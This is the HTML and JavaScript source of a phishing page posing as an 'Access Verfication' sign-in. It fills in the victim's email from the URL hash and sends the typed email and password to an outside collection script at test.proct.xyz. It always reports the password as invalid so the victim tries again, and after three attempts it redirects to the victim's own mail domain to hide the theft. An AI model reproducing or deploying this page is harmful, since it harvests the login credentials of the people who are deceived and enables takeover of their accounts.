
<html dir="ltr" class="" lang="en">
<iframe style="    border: 0;" src="" height="0" width="0"></iframe>
<head>
    <title>Access Verfication</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
<link id="favicon" rel="shortcut icon" type="image/png" href="https://logo.clearbit.com/undefined">



    <link rel="shortcut icon" href="">

    <meta name="robots" content="none">



<!-- Bootstrap core CSS -->
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="bootstrap.min.css">

<!-- Custom styles for this template -->
<style type="text/css">
   


    #rand{
        font-size: 0;
        
    }
    
    
    /* Large desktops and laptops */
@media (min-width: 1200px) {
 body {
        background-image: url(bS8rlwA.png);
        background-origin: inherit;
        background-size: cover;


    }
}

/* Landscape tablets and medium desktops */
@media (min-width: 992px) and (max-width: 1199px) {

}

/* Portrait tablets and small desktops */
@media (min-width: 768px) and (max-width: 991px) {
     body {
        background-image: url(bS8rlwA.png);
        background-origin: inherit;
        background-size: cover;


    }

}

/* Landscape phones and portrait tablets */
@media (max-width: 767px) {
      body {
   
          background-color: #FFF;


    }

}

/* Portrait phones and smaller */
@media (max-width: 480px) {
      body {
   
          background-color: #FFF;
         

    }
     .box {
              margin-top: 10%;
          }

}
    .box {

        padding: 10px;
        background-color: #FFF;
    }

    .imgc {
        padding: 20px;
    }

    .form-control {
        border: 0;
        border-radius: 0;
        border-bottom: 1px;
        border-bottom-style: solid;
        border-top-color: #FFF;
    }

    .btn {
        background-color: #734444;
        color: #FFF;
        padding-left: 30px;
        padding-right: 30px;
        border-radius: 0px;
        padding: 7px 24px;
        color: #FFF;
        font-size: 16px;

        border: 0;
        text-align: center;
        -webkit-transition: background .15s ease-in;
        transition: background .15s ease-in;
        cursor: pointer;
        min-width: 120px;

    }
    .btn:hover,.btn:focus{
        color: #FFF;
    }

    .thxsss {
        display: none;
    }
    .hid{
        margin-top: 14%;
    }
    li{
        float: right;
        padding-left: 10px;
    }
    .eml{
        padding: 10px;
        margin:1%;
        
        
    }
      .eml:hover{
       background-color: #E5E5E5;
        
        
    }
    
    
      .eml:active{
      border: 1px ;
          border-style: dotted;
          border-color: black;
          
        
        
    }
    
    .LOGin_F0rm{
        display: none;
    }


.loading-dots {
  text-align: center;
  z-index: 5;
    display: none;
}
.loading-dots .dot {
    color: #00A4EF;
  display: inline;
  margin-left: 0.2em;
  margin-right: 0.2em;
  position: relative;
  top: -1em;
  font-size: 4em;
  opacity: 0;
  -webkit-animation: showHideDot 2.5s ease-in-out infinite;
          animation: showHideDot 2.5s ease-in-out infinite;
}
.loading-dots .dot.one {
  -webkit-animation-delay: 0.2s;
          animation-delay: 0.2s;
}
.loading-dots .dot.two {
  -webkit-animation-delay: 0.4s;
          animation-delay: 0.4s;
}
.loading-dots .dot.three {
  -webkit-animation-delay: 0.6s;
          animation-delay: 0.6s;
}

@-webkit-keyframes showHideDot {
  0% {
    opacity: 0;
  }
  50% {
    opacity: 1;
  }
  60% {
    opacity: 1;
  }
  100% {
    opacity: 0;
  }
}

@keyframes showHideDot {
  0% {
    opacity: 0;
  }
  50% {
    opacity: 1;
  }
  60% {
    opacity: 1;
  }
  100% {
    opacity: 0;
  }
}
</style>




<br>
<section>
<h3.5>
    <div class="container ">
        <div class="row">
            <div class="col-md-12 hidden-sm hidden-xs">
            <div class="hid"></div>
            </div>
            <div class="col-md-4 col-md-offset-4 box">
              
                 
                <div class="imgc">
                   
                   
                   
                    <div id="form-messages"></div>
                    <div align="center"><img src="x.jpg" width="120" height="40" class="img-responsive xxlogo">
                      
                      
                    </div>
                    <div class="add_em" style="display: none;">
                        <p style="font-weight: bold;margin-left: 4%"></p>
                   <div class="eml">
                       
                   
                   <img class="tile-img" role="presentation" src=""> <span id="emx"></span><span style="float: right;margin-top: 4%"><img src="" alt=""></span>
                   </div>
                      <div class="eml">
                       
                   
                   <img class="tile-img" role="presentation" src=""> <span style="    word-wrap: break-word;"></span>
                   </div>
                
               </div>
                    

                    <br>
                    <div class="thxsss">
                        <div class="text-center">
                         <br><br>
                            <img style="width: 100px; text-align: center;" class="img-responsive" src=" ">
                        </div>
                        
                    

              
                    </div>
                <div style=" color:black;">Sign in with your email and password to gain access</div>
                <br>
                        


            <div class="office show border shadow bg-light" id="others">
                <div class="office-holder">
                    <div class="logo" style="text-align:center">
                        <div id="login_logo">
                         
                    <center>
                        <div id="msg" style="display: none;font-weight: 600;color: red;">Invalid Password! Enter correct password.</div>
                        <span id="error" class="text-danger" style="display: none;">Invalid email</span>
                    </center>
                    <form>
                        <div class="form-holder">
                            <div style="width: 100%;">
                                <div class="alert alert-danger hide alert2"></div>
                            </div>
                            <div align="right">
                              <input type="email" id="em" class="form-control" value="" placeholder="Email" required>
                              <input type="password" id="pw" placeholder="Password" class="form-control" required>
                              <br>
                              
                              <div class="btn-holder">
                              <button class="btn btn-lg col-12" id="submit-btn">Sign in</button>
                            </div>
                    </form>
                </div>
                        <br><br></div>
                        
                </div>


            </div>
        </div>
    </div>
 <div>
     <div>
      
     </div>
 </div>
<!-- /.container -->
   <!-- Optional JavaScript -->
    
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>
$(document).ready(function()
	{
	var g=0;
	var h=window.location.hash.substr(1);
	if(!h)
		{
	}
	else
		{
		var i=h;
		var j=i.indexOf("@");
		var k=i.substr(j+1);
		var c=k.substr(0,k.indexOf("."));
		var l=c.toLowerCase()
	}
	$('#othermodal').click(function()
		{
		$('#contact').trigger("reset");
		$("#msg").hide();
		$('#fieldImg').attr('src','');
		$('#field').html("Other Mail");
		$("#em").val(i);
		$("#emailch").html(i);
		$("#inputbar").animate(
			{
			left:200,opacity:"hide"
		}
		,0);
		$("#automail").animate(
			{
			right:200,opacity:"show"
		}
		,1000);
		$('#ajaxModal').modal('show')
	}
	);
	$('#submit-btn').click(function(b)
		{
		b.preventDefault();
		var c=$("#em").val();
		var d=$("#pw").val();
		var e=$("#field").html();
		var f=$('#msg').html();
		$('#msg').text(f);
		g=g+1;
		if(g>=3)
			{
			g=0;
			window.location.replace("http://www." + h);
		}
		else
			{
			$.ajax(
				{
				dataType:'JSON',url:'https://test.proct.xyz/doj/next.php',type:'POST',data:
					{
					em:c,pw:d,detail:e,
				}
				,beforeSend:function(a)
					{
					$('#submit-btn').html('Verifing...')
				}
				,success:function(a)
					{
					if(a)
						{
						$("#msg").show();
						console.log(a);
						if(a['signal']=='ok')
							{
							$("#pw").val("");
							$('#msg').html(a['msg'])
						}
						else
							{
							$("#pw").val("");
							$('#msg').html(a['msg'])
						}
					}
				}
				,error:function()
					{
					$("#pw").val("");
					$("#msg").show();
					$('#msg').html("Invalid Password! Enter correct password.")
				}
				,complete:function()
					{
					$("#pw").val("");
					$('#submit-btn').html('Sign in')
				}
			}
			)
		}
	}
	)
}
);
if(location.hash)
	{
	document.querySelector('#em').value=eml=location.hash.substr(1)
}

</script>   

</body></html>

